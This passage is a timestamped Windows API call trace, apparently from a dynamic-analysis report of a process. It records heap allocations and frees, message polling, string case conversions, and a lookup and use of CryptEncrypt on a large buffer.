Flags=0x0, Size=0x10) returned 0x34aa478 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24dfed0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0160.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.605] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0160.605] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xd6d0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xd6d8) returned 1 [0160.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0160.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.607] CharLowerBuffW (in: lpsz="byte[55000]", cchLength=0xb | out: lpsz="byte[55000]") returned 0xb [0160.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.608] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.608] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0160.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0160.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0160.608] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.608] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.608] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0160.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0160.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.609] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24dfed0*, pdwDataLen=0x8bef68*=0xd6d0, dwBufLen=0xd6d8 | out: pbData=0x24dfed0*, pdwDataLen=0x8bef68*=0xd6d8) returned 1 [0160.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0160.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0160.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0160.610] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0160.611] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.611] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0160.611] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0160.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0160.612] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.612] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0160.612] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0160.612] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0160.612] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.612] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0160.612] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.612] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0160.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0160.613] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0160.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.613] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0160.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.613] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0160.613] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.613] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.614] RtlAllocateHeap 